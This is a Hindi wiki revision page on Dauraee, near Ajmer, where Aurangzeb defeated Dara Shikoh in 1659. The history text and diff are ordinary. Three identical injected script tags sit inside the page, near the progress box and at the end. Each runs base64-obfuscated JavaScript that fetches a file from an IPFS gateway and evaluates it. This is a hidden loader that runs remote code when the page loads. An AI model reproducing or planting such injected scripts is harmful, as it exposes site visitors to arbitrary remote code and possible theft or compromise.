Difference between revisions of "दौराई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:राजस्थान के ऐतिहासिक स्थान (को हटा दिया गया हैं।))
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''दौराई''' आधुनिक [[राजस्थान]] में [[अजमेर]] के निकट स्थित एक प्रसिद्ध स्थान है। यह स्थान मध्यकालीन [[भारत का इतिहास|भारतीय इतिहास]] में एक निर्णायक युद्ध स्थल के रूप में बहुत प्रसिद्ध रहा है।
*आधुनिक [[राजस्थान]] में [[अजमेर]] के निकट स्थित दौराई मध्यकालीन इतिहास में एक निर्णायक युद्ध स्थल के रूप में प्रसिद्ध है।  
+
 
*यहाँ [[शाहजहाँ]] के उत्तराधिकार के लिए 1659 ई. में [[औरंगजेब]] एवं [[दारा शिकोह]] के बीच तीसरी एवं अन्तिम लड़ाई हुई, जिसमें दारा पूर्णतः पराजित हुआ और भाग निकाला।  
+
*दौराई ही वह स्थान है, जहाँ पर [[शाहजहाँ]] के उत्तराधिकार के लिए 1659 ई. में [[औरंगज़ेब]] एवं [[दारा शिकोह]] के बीच तीसरी एवं अन्तिम लड़ाई हुई थी।
*परंतु पकड़े जाने पर उस पर धर्मद्रोह का आरोप लगाकर औरंगजेब ने उसे फाँसी दे दी।
+
*उत्तराधिकार की इस लड़ाई में शाहजहाँ का चहेता दारा शिकोह पूर्णतः पराजित हुआ और भाग निकाला।
 +
*बाद के दिनों में दारा को औरंगज़ेब की फ़ौज द्वारा पकड़ लिया गया था।
 +
*राजगद्दी पर अपने अधिकार के लिए औरंगज़ेब ने अपने भाई दारा को फाँसी पर लटकवा दिया।
  
{{प्रचार}}
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
+
==संबंधित लेख==
[[Category:नया पन्ना]]
+
{{राजस्थान के ऐतिहासिक स्थान}}
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 +
[[Category:राजस्थान का इतिहास]]
 +
[[Category:ऐतिहासिक स्थान कोश]]
 +
[[Category:मध्य काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:18, 14 December 2011

dauraee adhunik rajasthan mean ajamer ke nikat sthit ek prasiddh sthan hai. yah sthan madhyakalin bharatiy itihas mean ek nirnayak yuddh sthal ke roop mean bahut prasiddh raha hai.

  • dauraee hi vah sthan hai, jahaan par shahajahaan ke uttaradhikar ke lie 1659 ee. mean aurangazeb evan dara shikoh ke bich tisari evan antim l daee huee thi.
  • uttaradhikar ki is l daee mean shahajahaan ka chaheta dara shikoh poornatah parajit hua aur bhag nikala.
  • bad ke dinoan mean dara ko aurangazeb ki fauj dvara pak d liya gaya tha.
  • rajagaddi par apane adhikar ke lie aurangazeb ne apane bhaee dara ko phaansi par latakava diya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>